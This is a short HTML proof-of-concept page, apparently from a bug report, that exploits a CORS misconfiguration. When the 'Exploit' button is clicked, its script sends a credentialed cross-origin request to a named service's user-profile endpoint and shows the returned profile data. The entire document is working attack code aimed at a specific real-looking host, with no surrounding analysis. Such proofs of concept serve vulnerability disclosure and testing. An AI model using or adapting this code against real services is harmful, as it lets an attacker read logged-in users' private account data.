<html><body><h2>CORS PoC</h2><div id="demo"><button type="button" onclick="cors()">Exploit</button></div><script>function cors() {var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (this.readyState == 4 && this.status == 200) {document.getElementById("demo").innerHTML = alert(this.responseText);}};xhr.open("GET","https://dev-services.qount.io/UserService/orgs/qount/users/[email protected]/userprofile", true);xhr.withCredentials = true;xhr.send();}</script></body></html>